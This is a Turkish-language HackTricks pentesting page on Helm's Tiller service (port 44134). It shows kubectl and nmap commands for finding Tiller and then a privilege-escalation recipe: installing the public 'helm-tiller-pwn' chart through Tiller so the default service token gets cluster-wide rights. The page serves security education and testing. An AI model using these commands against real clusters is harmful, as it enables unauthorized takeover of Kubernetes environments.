5.4 KiB
{% hint style="success" %}
AWS Hacking'i öğrenin ve pratik yapın:HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)
GCP Hacking'i öğrenin ve pratik yapın: HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)
HackTricks'i Destekleyin
- abonelik planlarını kontrol edin!
- Bize katılın 💬 Discord grubuna veya telegram grubuna veya bizi Twitter'da 🐦 @hacktricks_live** takip edin.**
- Hacking ipuçlarını paylaşmak için HackTricks ve HackTricks Cloud github reposuna PR gönderin.
Temel Bilgiler
Helm, Kubernetes için paket yöneticisidir. YAML dosyalarını paketlemeye ve bunları kamu ve özel depolarda dağıtmaya olanak tanır. Bu paketlere Helm Charts denir. Tiller, varsayılan olarak 44134 numaralı portta çalışan hizmettir.
Varsayılan port: 44134
PORT STATE SERVICE VERSION
44134/tcp open unknown
Enumeration
Eğer farklı ad alanlarının podlarını ve/veya hizmetlerini sıralayabiliyorsanız, bunları sıralayın ve adında "tiller" geçenleri arayın:
kubectl get pods | grep -i "tiller"
kubectl get services | grep -i "tiller"
kubectl get pods -n kube-system | grep -i "tiller"
kubectl get services -n kube-system | grep -i "tiller"
kubectl get pods -n <namespace> | grep -i "tiller"
kubectl get services -n <namespace> | grep -i "tiller"
Örnekler:
kubectl get pods -n kube-system
NAME READY STATUS RESTARTS AGE
kube-scheduler-controlplane 1/1 Running 0 35m
tiller-deploy-56b574c76d-l265z 1/1 Running 0 35m
kubectl get services -n kube-system
NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE
kube-dns ClusterIP 10.96.0.10 <none> 53/UDP,53/TCP,9153/TCP 35m
tiller-deploy ClusterIP 10.98.57.159 <none> 44134/TCP 35m
Bu hizmetin çalışıp çalışmadığını kontrol ederek 44134 numaralı portu kontrol etmeyi de deneyebilirsiniz:
sudo nmap -sS -p 44134 <IP>
Bir kez keşfettikten sonra, istemci helm uygulamasını indirerek onunla iletişim kurabilirsiniz. homebrew
gibi araçlar kullanabilir veya resmi sürümler sayfasına** bakabilirsiniz.** Daha fazla ayrıntı veya diğer seçenekler için kurulum kılavuzuna bakın.
Sonra, servisi listeleyebilirsiniz:
helm --host tiller-deploy.kube-system:44134 version
Yetki Yükseltme
Varsayılan olarak Helm2, kube-system ad alanında yüksek yetkilerle kuruldu, bu nedenle hizmeti bulup buna erişiminiz varsa, bu size yetki yükseltme imkanı verebilir.
Yapmanız gereken tek şey, tüm kümedeki her şeye varsayılan hizmet token erişimi verecek olan şu paketi kurmaktır: https://github.com/Ruil1n/helm-tiller-pwn
git clone https://github.com/Ruil1n/helm-tiller-pwn
helm --host tiller-deploy.kube-system:44134 install --name pwnchart helm-tiller-pwn
/pwnchart
In http://rui0.cn/archives/1573 saldırının açıklamasını bulabilirsiniz, ancak temelde, helm-tiller-pwn/pwnchart/templates/ içindeki clusterrole.yaml ve clusterrolebinding.yaml dosyalarını okursanız, tüm ayrıcalıkların varsayılan tokene nasıl verildiğini görebilirsiniz.
{% hint style="success" %}
AWS Hacking Öğrenin ve Pratik Yapın:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking Öğrenin ve Pratik Yapın: HackTricks Training GCP Red Team Expert (GRTE)
HackTricks'i Destekleyin
- abonelik planlarını kontrol edin!
- 💬 Discord grubuna veya telegram grubuna katılın ya da Twitter'da 🐦 @hacktricks_live'i takip edin.**
- Hacking ipuçlarını paylaşmak için HackTricks ve HackTricks Cloud github reposuna PR gönderin.